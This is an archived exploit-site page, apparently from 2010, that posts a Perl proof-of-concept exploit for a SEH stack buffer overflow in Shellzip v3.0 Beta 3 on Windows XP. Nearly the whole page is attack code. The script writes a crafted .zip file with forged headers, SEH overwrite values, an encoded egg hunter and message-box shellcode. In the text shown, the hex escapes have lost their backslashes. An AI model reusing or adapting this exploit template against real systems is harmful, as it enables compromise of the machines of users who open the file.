Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC
Posted on 16 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================================== Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit ================================================================== #*********************************************************************************** # Exploit Title : Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit # Date : 16/05/2010 # Author : Sud0 # Bug found by : Sud0 # Software Link : http://www.softsea.com/download/ShellZip.html # Version : 3;0 Beta 3 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Thanks to my wife for her support # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #*********************************************************************************** #code : print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print "[+] Exploit for .... "; my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00" . "xe4x0f" .# file size: don't change "x00x00x00"; my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00x00". "xe4x0f". # file size: don't change "x00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00". "x12x10x00x00". # "x02x10x00x00". # "x00x00"; #Corelan MsgBox my $shellcode = "w00tw00t" . "xd9xebx9bxd9x74x24xf4x31xd2xb2x7ax31xc9x64x8b". "x71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8b". "x36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24". "x24x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5a". "x20x01xebxe3x37x49x8bx34x8bx01xeex31xffx31xc0". "xfcxacx84xc0x74x0axc1xcfx0dx01xc7xe9xf1xffxff". "xffx3bx7cx24x28x75xdex8bx5ax24x01xebx66x8bx0c". "x4bx8bx5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1c". "x61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4ex0exec". "x52xe8x9cxffxffxffx89x45x04xbbx7exd8xe2x73x87". "x1cx24x52xe8x8bxffxffxffx89x45x08x68x6cx6cx20". "xffx68x33x32x2ex64x68x75x73x65x72x88x5cx24x0a". "x89xe6x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87". "x1cx24x52xe8x5exffxffxffx68x6cx61x6ex58x68x63". "x6fx72x65x31xdbx88x5cx24x07x89xe3x68x64x58x20". "x20x68x6fx69x74x65x68x65x78x70x6cx31xc9x88x4c". "x24x09x89xe1x31xd2x52x53x51x52xffxd0x31xc0x50". "xffx55x08"; my $filename="shellzip.zip"; #Egg Hunter encoded with basereg ESI my $egg="VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI56K1JjYoDOrbpRSZURrxxMtnWLgupZPtxoOH47Tp6Pd4nkyjnOQekZnOpuKWKOxgA"; my $size = 4064; # Aligne ESI to start of egghunter + Call ESI my $junk = "AA". $egg ."A" x (224-length($egg)) . "x58x58x58" . "x2Dx3Bx54x55x55". "x2Dx3Bx54x55x55". "x2Dx3Cx56x55x55". "x50x5Ex53x58" . "x98x99"; $junk =$junk . "A" x( 288-length($junk)); # some JUNK my $nseh = "x74xA8x74x20"; my $seh = "x3Ex4Bx60x00"; my $payload = $junk.$nseh.$seh . "A" x 25 . $shellcode . "B" x (4064-288-25-8-length($shellcode)). ".txt"; print "Size : " . length($payload)." "; print "Removing old $filename file "; system("del $filename"); print "Creating new $filename file "; open(FILE, ">$filename"); print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header; close(FILE); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
